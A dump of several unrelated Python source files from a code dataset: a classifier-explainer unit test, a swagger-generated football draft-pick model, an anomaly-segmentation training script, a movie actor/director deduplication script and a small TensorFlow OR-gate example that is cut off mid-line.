self.explainer = ClassifierExplainer(model, X_test, y_test, \n cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']}, \n 'Deck', 'Embarked'],\n cats_notencoded={'Gender':'No Gender'},\n idxs=test_names, \n labels=['Not survived', 'Survived'])\n\n def test_pos_label(self):\n self.explainer.pos_label = 1\n self.explainer.pos_label = \"Not survived\"\n self.assertIsInstance(self.explainer.pos_label, int)\n self.assertIsInstance(self.explainer.pos_label_str, str)\n self.assertEqual(self.explainer.pos_label, 0)\n self.assertEqual(self.explainer.pos_label_str, \"Not survived\")\n\n def test_custom_metrics(self):\n def meandiff_metric1(y_true, y_pred):\n return np.mean(y_true)-np.mean(y_pred)\n\n def meandiff_metric2(y_true, y_pred, cutoff):\n return np.mean(y_true)-np.mean(np.where(y_pred>cutoff, 1, 0))\n\n def meandiff_metric3(y_true, y_pred, pos_label):\n return np.mean(np.where(y_true==pos_label, 1, 0))-np.mean(y_pred[:, pos_label])\n\n def meandiff_metric4(y_true, y_pred, cutoff, pos_label):\n return np.mean(np.where(y_true==pos_label, 1, 0))-np.mean(np.where(y_pred[:, pos_label] > cutoff, 1, 0))\n\n metrics = np.array(list(self.explainer.metrics(\n show_metrics=[meandiff_metric1, meandiff_metric2, meandiff_metric3, meandiff_metric4]\n ).values()))\n self.assertTrue(np.all(metrics==metrics[0]))\n\n\n def test_pred_probas(self):\n self.assertIsInstance(self.explainer.pred_probas(), np.ndarray)\n self.assertIsInstance(self.explainer.pred_probas(1), np.ndarray)\n self.assertIsInstance(self.explainer.pred_probas(\"Survived\"), np.ndarray)\n\n def test_metrics(self):\n self.assertIsInstance(self.explainer.metrics(), dict)\n self.assertIsInstance(self.explainer.metrics(cutoff=0.9), dict)\n self.assertIsInstance(self.explainer.metrics_descriptions(cutoff=0.9), dict)\n\n def test_precision_df(self):\n self.assertIsInstance(self.explainer.get_precision_df(), pd.DataFrame)\n self.assertIsInstance(self.explainer.get_precision_df(multiclass=True), pd.DataFrame)\n self.assertIsInstance(self.explainer.get_precision_df(quantiles=4), pd.DataFrame)\n\n def test_lift_curve_df(self):\n self.assertIsInstance(self.explainer.get_liftcurve_df(), pd.DataFrame)\n\n def test_calculate_properties(self):\n self.explainer.calculate_properties()\n \n def test_plot_precision(self):\n fig = self.explainer.plot_precision()\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_precision(multiclass=True)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_precision(quantiles=10, cutoff=0.5)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_cumulutive_precision(self):\n fig = self.explainer.plot_cumulative_precision()\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_cumulative_precision(percentile=0.5)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_cumulative_precision(percentile=0.1, pos_label=0)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_confusion_matrix(self):\n fig = self.explainer.plot_confusion_matrix(normalized=False, binary=False)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_confusion_matrix(normalized=False, binary=True)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_confusion_matrix(normalized=True, binary=False)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_confusion_matrix(normalized=True, binary=True)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_lift_curve(self):\n fig = self.explainer.plot_lift_curve()\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_lift_curve(percentage=True)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_lift_curve(cutoff=0.5)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_lift_curve(add_wizard=False, round=3)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_lift_curve(self):\n fig = self.explainer.plot_lift_curve()\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_lift_curve(percentage=True)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_lift_curve(cutoff=0.5)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_classification(self):\n fig = self.explainer.plot_classification()\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_classification(percentage=True)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_classification(cutoff=0)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_classification(cutoff=1)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_roc_auc(self):\n fig = self.explainer.plot_roc_auc(0.5)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_roc_auc(0.0)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_roc_auc(1.0)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_pr_auc(self):\n fig = self.explainer.plot_pr_auc(0.5)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_pr_auc(0.0)\n self.assertIsInstance(fig, go.Figure)\n\n fig = self.explainer.plot_pr_auc(1.0)\n self.assertIsInstance(fig, go.Figure)\n\n def test_plot_prediction_result(self):\n fig = self.explainer.plot_prediction_result(0)\n self.assertIsInstance(fig, go.Figure)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"mikewcasale/explainerdashboard","sub_path":"tests/test_classifier_explainer.py","file_name":"test_classifier_explainer.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40646154680","text":"# coding: utf-8\n\n\"\"\"\n College Football Data API\n\n This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. \\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. # noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass DraftPick(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'college_athlete_id': 'int',\n 'nfl_athlete_id': 'int',\n 'college_id': 'int',\n 'college_team': 'str',\n 'college_conference': 'str',\n 'nfl_team': 'str',\n 'year': 'int',\n 'overall': 'int',\n 'round': 'int',\n 'pick': 'int',\n 'name': 'str',\n 'position': 'str',\n 'height': 'int',\n 'weight': 'int',\n 'pre_draft_ranking': 'int',\n 'pre_draft_position_ranking': 'int',\n 'pre_draft_grade': 'int',\n 'hometown_info': 'DraftPickHometownInfo'\n }\n\n attribute_map = {\n 'college_athlete_id': 'collegeAthleteId',\n 'nfl_athlete_id': 'nflAthleteId',\n 'college_id': 'collegeId',\n 'college_team': 'collegeTeam',\n 'college_conference': 'collegeConference',\n 'nfl_team': 'nflTeam',\n 'year': 'year',\n 'overall': 'overall',\n 'round': 'round',\n 'pick': 'pick',\n 'name': 'name',\n 'position': 'position',\n 'height': 'height',\n 'weight': 'weight',\n 'pre_draft_ranking': 'preDraftRanking',\n 'pre_draft_position_ranking': 'preDraftPositionRanking',\n 'pre_draft_grade': 'preDraftGrade',\n 'hometown_info': 'hometownInfo'\n }\n\n def __init__(self, college_athlete_id=None, nfl_athlete_id=None, college_id=None, college_team=None, college_conference=None, nfl_team=None, year=None, overall=None, round=None, pick=None, name=None, position=None, height=None, weight=None, pre_draft_ranking=None, pre_draft_position_ranking=None, pre_draft_grade=None, hometown_info=None, _configuration=None): # noqa: E501\n \"\"\"DraftPick - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._college_athlete_id = None\n self._nfl_athlete_id = None\n self._college_id = None\n self._college_team = None\n self._college_conference = None\n self._nfl_team = None\n self._year = None\n self._overall = None\n self._round = None\n self._pick = None\n self._name = None\n self._position = None\n self._height = None\n self._weight = None\n self._pre_draft_ranking = None\n self._pre_draft_position_ranking = None\n self._pre_draft_grade = None\n self._hometown_info = None\n self.discriminator = None\n\n if college_athlete_id is not None:\n self.college_athlete_id = college_athlete_id\n if nfl_athlete_id is not None:\n self.nfl_athlete_id = nfl_athlete_id\n if college_id is not None:\n self.college_id = college_id\n if college_team is not None:\n self.college_team = college_team\n if college_conference is not None:\n self.college_conference = college_conference\n if nfl_team is not None:\n self.nfl_team = nfl_team\n if year is not None:\n self.year = year\n if overall is not None:\n self.overall = overall\n if round is not None:\n self.round = round\n if pick is not None:\n self.pick = pick\n if name is not None:\n self.name = name\n if position is not None:\n self.position = position\n if height is not None:\n self.height = height\n if weight is not None:\n self.weight = weight\n if pre_draft_ranking is not None:\n self.pre_draft_ranking = pre_draft_ranking\n if pre_draft_position_ranking is not None:\n self.pre_draft_position_ranking = pre_draft_position_ranking\n if pre_draft_grade is not None:\n self.pre_draft_grade = pre_draft_grade\n if hometown_info is not None:\n self.hometown_info = hometown_info\n\n @property\n def college_athlete_id(self):\n \"\"\"Gets the college_athlete_id of this DraftPick. # noqa: E501\n\n\n :return: The college_athlete_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._college_athlete_id\n\n @college_athlete_id.setter\n def college_athlete_id(self, college_athlete_id):\n \"\"\"Sets the college_athlete_id of this DraftPick.\n\n\n :param college_athlete_id: The college_athlete_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._college_athlete_id = college_athlete_id\n\n @property\n def nfl_athlete_id(self):\n \"\"\"Gets the nfl_athlete_id of this DraftPick. # noqa: E501\n\n\n :return: The nfl_athlete_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._nfl_athlete_id\n\n @nfl_athlete_id.setter\n def nfl_athlete_id(self, nfl_athlete_id):\n \"\"\"Sets the nfl_athlete_id of this DraftPick.\n\n\n :param nfl_athlete_id: The nfl_athlete_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._nfl_athlete_id = nfl_athlete_id\n\n @property\n def college_id(self):\n \"\"\"Gets the college_id of this DraftPick. # noqa: E501\n\n\n :return: The college_id of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._college_id\n\n @college_id.setter\n def college_id(self, college_id):\n \"\"\"Sets the college_id of this DraftPick.\n\n\n :param college_id: The college_id of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._college_id = college_id\n\n @property\n def college_team(self):\n \"\"\"Gets the college_team of this DraftPick. # noqa: E501\n\n\n :return: The college_team of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._college_team\n\n @college_team.setter\n def college_team(self, college_team):\n \"\"\"Sets the college_team of this DraftPick.\n\n\n :param college_team: The college_team of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._college_team = college_team\n\n @property\n def college_conference(self):\n \"\"\"Gets the college_conference of this DraftPick. # noqa: E501\n\n\n :return: The college_conference of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._college_conference\n\n @college_conference.setter\n def college_conference(self, college_conference):\n \"\"\"Sets the college_conference of this DraftPick.\n\n\n :param college_conference: The college_conference of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._college_conference = college_conference\n\n @property\n def nfl_team(self):\n \"\"\"Gets the nfl_team of this DraftPick. # noqa: E501\n\n\n :return: The nfl_team of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._nfl_team\n\n @nfl_team.setter\n def nfl_team(self, nfl_team):\n \"\"\"Sets the nfl_team of this DraftPick.\n\n\n :param nfl_team: The nfl_team of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._nfl_team = nfl_team\n\n @property\n def year(self):\n \"\"\"Gets the year of this DraftPick. # noqa: E501\n\n\n :return: The year of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._year\n\n @year.setter\n def year(self, year):\n \"\"\"Sets the year of this DraftPick.\n\n\n :param year: The year of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._year = year\n\n @property\n def overall(self):\n \"\"\"Gets the overall of this DraftPick. # noqa: E501\n\n\n :return: The overall of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._overall\n\n @overall.setter\n def overall(self, overall):\n \"\"\"Sets the overall of this DraftPick.\n\n\n :param overall: The overall of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._overall = overall\n\n @property\n def round(self):\n \"\"\"Gets the round of this DraftPick. # noqa: E501\n\n\n :return: The round of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._round\n\n @round.setter\n def round(self, round):\n \"\"\"Sets the round of this DraftPick.\n\n\n :param round: The round of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._round = round\n\n @property\n def pick(self):\n \"\"\"Gets the pick of this DraftPick. # noqa: E501\n\n\n :return: The pick of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pick\n\n @pick.setter\n def pick(self, pick):\n \"\"\"Sets the pick of this DraftPick.\n\n\n :param pick: The pick of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pick = pick\n\n @property\n def name(self):\n \"\"\"Gets the name of this DraftPick. # noqa: E501\n\n\n :return: The name of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this DraftPick.\n\n\n :param name: The name of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def position(self):\n \"\"\"Gets the position of this DraftPick. # noqa: E501\n\n\n :return: The position of this DraftPick. # noqa: E501\n :rtype: str\n \"\"\"\n return self._position\n\n @position.setter\n def position(self, position):\n \"\"\"Sets the position of this DraftPick.\n\n\n :param position: The position of this DraftPick. # noqa: E501\n :type: str\n \"\"\"\n\n self._position = position\n\n @property\n def height(self):\n \"\"\"Gets the height of this DraftPick. # noqa: E501\n\n\n :return: The height of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this DraftPick.\n\n\n :param height: The height of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._height = height\n\n @property\n def weight(self):\n \"\"\"Gets the weight of this DraftPick. # noqa: E501\n\n\n :return: The weight of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n \"\"\"Sets the weight of this DraftPick.\n\n\n :param weight: The weight of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._weight = weight\n\n @property\n def pre_draft_ranking(self):\n \"\"\"Gets the pre_draft_ranking of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_ranking of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_ranking\n\n @pre_draft_ranking.setter\n def pre_draft_ranking(self, pre_draft_ranking):\n \"\"\"Sets the pre_draft_ranking of this DraftPick.\n\n\n :param pre_draft_ranking: The pre_draft_ranking of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_ranking = pre_draft_ranking\n\n @property\n def pre_draft_position_ranking(self):\n \"\"\"Gets the pre_draft_position_ranking of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_position_ranking of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_position_ranking\n\n @pre_draft_position_ranking.setter\n def pre_draft_position_ranking(self, pre_draft_position_ranking):\n \"\"\"Sets the pre_draft_position_ranking of this DraftPick.\n\n\n :param pre_draft_position_ranking: The pre_draft_position_ranking of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_position_ranking = pre_draft_position_ranking\n\n @property\n def pre_draft_grade(self):\n \"\"\"Gets the pre_draft_grade of this DraftPick. # noqa: E501\n\n\n :return: The pre_draft_grade of this DraftPick. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pre_draft_grade\n\n @pre_draft_grade.setter\n def pre_draft_grade(self, pre_draft_grade):\n \"\"\"Sets the pre_draft_grade of this DraftPick.\n\n\n :param pre_draft_grade: The pre_draft_grade of this DraftPick. # noqa: E501\n :type: int\n \"\"\"\n\n self._pre_draft_grade = pre_draft_grade\n\n @property\n def hometown_info(self):\n \"\"\"Gets the hometown_info of this DraftPick. # noqa: E501\n\n\n :return: The hometown_info of this DraftPick. # noqa: E501\n :rtype: DraftPickHometownInfo\n \"\"\"\n return self._hometown_info\n\n @hometown_info.setter\n def hometown_info(self, hometown_info):\n \"\"\"Sets the hometown_info of this DraftPick.\n\n\n :param hometown_info: The hometown_info of this DraftPick. # noqa: E501\n :type: DraftPickHometownInfo\n \"\"\"\n\n self._hometown_info = hometown_info\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(DraftPick, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DraftPick):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DraftPick):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/draft_pick.py","file_name":"draft_pick.py","file_ext":"py","file_size_in_byte":15563,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"13109216573","text":"import argparse\nimport torch.distributed as dist\nimport torch.optim\nfrom config.config import config\nfrom dataset.data_loader import Fishyscapes, Cityscapes\nfrom dataset.data_loader import get_mix_loader\nfrom engine.engine import Engine\nfrom engine.evaluator import SlidingEval\nfrom engine.lr_policy import WarmUpPolyLR\nfrom engine.trainer import Trainer\nfrom losses import *\nfrom model.network import Network\nfrom utils.img_utils import *\nfrom utils.wandb_upload import *\nfrom valid import *\n\nfrom utils.logger import *\n\nwarnings.filterwarnings('ignore', '.*imshow.*', )\n\n\ndef declare_settings(config_file, logger, engine):\n logger.critical(\"distributed data parallel training: {}\".format(str(\"on\" if engine.distributed is True\n else \"off\")))\n \n logger.critical(\"gpus: {}, with batch_size[local]: {}\".format(engine.world_size, config.batch_size))\n\n logger.critical(\"network architecture: {}, with ResNet {} backbone\".format(\"deeplabv3+\",\n config_file['pretrained_weight_path']\n .split('/')[-1].split('_')[0]))\n logger.critical(\"learning rate: other {}, and head is same [world]\".format(config_file['lr']))\n\n logger.info(\"image: {}x{} based on 1024x2048\".format(config_file['image_height'],\n config_file['image_width']))\n\n logger.info(\"current batch: {} [world]\".format(int(config_file['batch_size']) * engine.world_size))\n\n\ndef main(gpu, ngpus_per_node, config, args):\n args.local_rank = gpu\n logger = logging.getLogger(\"pebal\")\n logger.propagate = False\n engine = Engine(custom_arg=args, logger=logger,\n continue_state_object=config.pretrained_weight_path)\n\n if engine.local_rank <= 0:\n declare_settings(config_file=config, logger=logger, engine=engine)\n visual_tool = Tensorboard(config=config)\n else:\n visual_tool = None\n\n seed = config.seed\n\n if engine.distributed:\n seed = seed + engine.local_rank\n\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n model = Network(config.num_classes, wide=True)\n gambler_loss = Gambler(reward=[4.5], pretrain=-1, device=engine.local_rank if engine.local_rank >= 0 else 0)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)\n testing_transform = Compose([ToTensor(), Normalize(config.image_mean, config.image_std)])\n fishyscapes_ls = Fishyscapes(split='LostAndFound', root=config.fishy_root_path, transform=testing_transform)\n fishyscapes_static = Fishyscapes(split='Static', root=config.fishy_root_path, transform=testing_transform)\n cityscapes = Cityscapes(root=config.city_root_path, split=\"val\", transform=testing_transform)\n\n # config lr policy\n base_lr = config.lr\n total_iteration = config.nepochs * config.niters_per_epoch\n lr_policy = WarmUpPolyLR(base_lr, config.lr_power, total_iteration, config.niters_per_epoch * config.warm_up_epoch)\n trainer = Trainer(engine=engine, loss1=gambler_loss, loss2=energy_loss, lr_scheduler=lr_policy,\n ckpt_dir=config.saved_dir, tensorboard=visual_tool)\n\n evaluator = SlidingEval(config, device=0 if engine.local_rank < 0 else engine.local_rank)\n\n if engine.distributed:\n torch.cuda.set_device(engine.local_rank)\n model.cuda(engine.local_rank)\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[engine.local_rank],\n find_unused_parameters=True)\n else:\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = torch.nn.DataParallel(model, device_ids=engine.devices)\n model.to(device)\n\n # starting with the pre-trained weight from https://github.com/NVIDIA/semantic-segmentation/tree/sdcnet\n if engine.continue_state_object:\n engine.register_state(dataloader=None, model=model, optimizer=optimizer)\n engine.restore_checkpoint(extra_channel=True)\n # engine.load_pebal_ckpt(config.pebal_weight_path, model=model)\n\n logger.info('training begin...')\n\n for curr_epoch in range(engine.state.epoch, config.nepochs):\n\n train_loader, train_sampler, void_ind = get_mix_loader(engine=engine, augment=True,\n cs_root=config.city_root_path,\n coco_root=config.coco_root_path)\n\n engine.register_state(dataloader=train_loader, model=model, optimizer=optimizer)\n\n trainer.train(model=model, epoch=curr_epoch, train_sampler=train_sampler, train_loader=train_loader,\n optimizer=optimizer)\n\n if curr_epoch % config.eval_epoch == 0:\n if engine.local_rank <= 0:\n \"\"\"\n # 1). we currently only support single gpu for the cityscapes sliding validation, and it might\n # take long time, feel free to uncomment it. (we have to use the sliding eval. to achieve the\n # performance reported in the repo. https://github.com/NVIDIA/semantic-segmentation/tree/sdcnet\n # from the pre-trained ckpt.)\n # 2). we follow Meta-OoD to use single scale validation in OoD datasets, for fair comparison.\n \"\"\"\n # valid_epoch(model=model, engine=engine, test_set=cityscapes, my_wandb=visual_tool,\n # evaluator=evaluator, logger=logger)\n\n valid_anomaly(model=model, epoch=curr_epoch, test_set=fishyscapes_ls, data_name='Fishyscapes_ls',\n my_wandb=visual_tool, logger=logger)\n\n valid_anomaly(model=model, epoch=curr_epoch, test_set=fishyscapes_static,\n data_name='Fishyscapes_static', my_wandb=visual_tool, logger=logger)\n\n if engine.distributed:\n dist.barrier()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Anomaly Segmentation')\n parser.add_argument('--gpus', default=1,\n type=int,\n help=\"gpus in use\")\n parser.add_argument('-l', '--local_rank', default=-1,\n type=int,\n help=\"distributed or not\")\n parser.add_argument('-n', '--nodes', default=1,\n type=int,\n help=\"distributed or not\")\n args = parser.parse_args()\n\n torch.backends.cudnn.benchmark = True\n\n args.world_size = args.nodes * args.gpus\n\n # we enforce the flag of ddp if gpus >= 2;\n args.ddp = True if args.world_size > 1 else False\n if args.gpus <= 1:\n main(-1, 1, config=config, args=args)\n else:\n torch.multiprocessing.spawn(main, nprocs=args.gpus, args=(args.gpus, config, args))\n","repo_name":"tianyu0207/PEBAL","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","stars":132,"dataset":"github-code","pt":"72"} +{"seq_id":"22804710848","text":"import csv\nimport Levenshtein\n\nurl = \"../../../data/NewRawData/id_director_actor.csv\"\nurlA = \"../../../data/NewRawData/actor.csv\"\nurlD = \"../../../data/NewRawData/director.csv\"\n\n\n# 创建和写文件函数\n# def create_csv():\n# path = url\n# with open(path, 'w') as f:\n# csv_write = csv.writer(f)\n#\n#\n# def write_csv(c):\n# path = url\n# with open(path, 'a+', newline='', encoding='utf-8') as f:\n# csv_write = csv.writer(f)\n# data_row = c\n# csv_write.writerow(data_row)\n\n\n# 创建和写文件函数\ndef create_csvD():\n path = urlD\n with open(path, 'w') as f:\n csv_write = csv.writer(f)\n\n\ndef write_csvD(c):\n path = urlD\n with open(path, 'a+', newline='', encoding='utf-8') as f:\n csv_write = csv.writer(f)\n data_row = c\n csv_write.writerow(data_row)\n\n\n# 创建和写文件函数\ndef create_csvA():\n path = urlA\n with open(path, 'w') as f:\n csv_write = csv.writer(f)\n\n\ndef write_csvA(c):\n path = urlA\n with open(path, 'a+', newline='', encoding='utf-8') as f:\n csv_write = csv.writer(f)\n data_row = c\n csv_write.writerow(data_row)\n\n\nif __name__ == \"__main__\":\n\n actor = {}\n director = {}\n name = {}\n actorSet = set()\n directorSet = set()\n # create_csv()\n # firstLine = \"ids\", \"directors\", \"actors\"\n\n resFile = open(\"../../../data/result/last.csv\", \"r\", encoding=\"utf-8\")\n resReader = csv.reader(resFile)\n for line in resReader:\n actor[line[0]] = line[3]\n director[line[0]] = line[2]\n name[line[0]] = line[1]\n\n csvFile = open(\"../../../data/raw/updateMergedMovie.csv\", \"r\", encoding=\"utf-8\")\n reader = csv.reader(csvFile)\n i = 0\n for line in reader:\n i = i + 1\n if i % 1000 == 0:\n print(i)\n idList = line[0].strip(\"[\").strip(\"]\").split(\",\")\n actorsss = set()\n directorsss = set()\n namesss = ''\n for item in idList:\n idItem = item.strip().strip(\"'\").strip()\n if idItem not in actor.keys():\n continue\n actorList = actor[idItem].split(\",\")\n directorList = director[idItem].split(\",\")\n namesss = name[idItem]\n for actorItem in actorList:\n temp = actorItem.strip()\n tempactor = set()\n if len(actorsss) == 0:\n actorsss.add(temp)\n actorSet.add(temp)\n for actorI in actorsss:\n if Levenshtein.distance(temp, actorI) > 5:\n tempactor.add(temp)\n actorSet.add(temp)\n for tempactorItem in tempactor:\n actorsss.add(tempactorItem)\n for directorItem in directorList:\n temp = directorItem.strip()\n tempdirector = set()\n if len(directorsss) == 0:\n directorsss.add(temp)\n directorSet.add(temp)\n for directorI in directorsss:\n if Levenshtein.distance(temp, directorI) > 5:\n tempdirector.add(temp)\n directorSet.add(temp)\n for tempdirectorItem in tempdirector:\n directorsss.add(tempdirectorItem)\n for item in idList:\n content = item, directorsss, actorsss, namesss\n # write_csv(content)\n\n create_csvA()\n create_csvD()\n for ac in actorSet:\n content = ac,\n write_csvA(content)\n for di in directorSet:\n content = di,\n write_csvD(content)\n","repo_name":"aroundabout/DataWarehouse","sub_path":"etl/DataProcess/format/getActorAndDirector.py","file_name":"getActorAndDirector.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35684845108","text":"def solution(L, x) :\n if x > L[len(L)-1]:\n L.insert(len(L), x)\n else:\n for i in range(len(L)):\n if x < L[i]:\n L.insert(i, x)\n break\n return L\n\nL = [1,2,3,4,5,6]\nprint(solution(L,7))\n","repo_name":"mike6321/dataStructure_algorithm","sub_path":"Homework01/Problem02.py","file_name":"Problem02.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34281359221","text":"import numpy as np\nimport tensorflow as tf\ntf.compat.v1.disable_v2_behavior()\ntf.compat.v1.disable_eager_execution() # 把tensorflow2.0降级到1.0\n\nw = tf.Variable(tf.zeros([2, 1])) # 异或门输入为1x2,w设置为2x1\nb = tf.Variable(tf.zeros([1])) # x*w后是一个标量,偏置b设置为一维标量\n\nx = tf.compat.v1.placeholder(tf.float32, shape=[None, 2]) # 1.0的语法,x现在还是空壳,用于接收之后输入的1x2的X\nt = tf.compat.v1.placeholder(tf.float32, shape=[None, 1]) # t不是0就是1,设置为接收之后输入的Y\ny = tf.nn.sigmoid(tf.matmul(x, w) + b) # y为sigmoid函数,变量设置为 (x * w) + b\n\ncross_entropy = -tf.reduce_sum(t * tf.compat.v1.log(y) + (1 - t) * tf.compat.v1.log(1 - y)) # 直观的交叉熵误差函数\n\ntrain_step = tf.compat.v1.train.GradientDescentOptimizer(0.1).minimize(cross_entropy) # train_step用学习率为0.1 的梯度下降法去求最小化交叉熵误差函数成立时的w和b\n\ncorrect_prediction = tf.equal(tf.compat.v1.to_float(tf.greater(y, 0.5)), t) # y>=0.5用tf.greater输出1,反之为0,之后转为float,然后用equal和标签t进行对比,结果输出给correct_prediction\n # 为什么>=0.5呢?因为输出值在训练后会更贴近真实值\nX = np.array([[0, 0], [0, 1], [1, 0], [1, 1]]) # 或门的四种输入情况\n\nY = np.array([[0], [1], [1], [1]]) # 四种输入情况对应的真实输出,即标签\n\ninit = tf.compat.v1.global_variables_initializer() # 1.0的语法,我也不太清楚,好像是想用tf的变量就要在Session.run里\nsess = tf.compat.v1.Session()\nsess.run(init)\n\nfor epoch in range(200): # 迭代两百次\n sess.run(train_step, feed_dict={\n x: X,\n t: Y\n })\n\nclassified = sess.run(correct_prediction, feed_dict={ #检测y的学习效果,看y的输出是否和t对应\n x: X,\n t: Y\n})\n\nprint(classified)\n\nprob = sess.run(y, feed_dict={\n x: X,\n t: Y\n})\n\nprint(prob)\n\nprint('w: ', 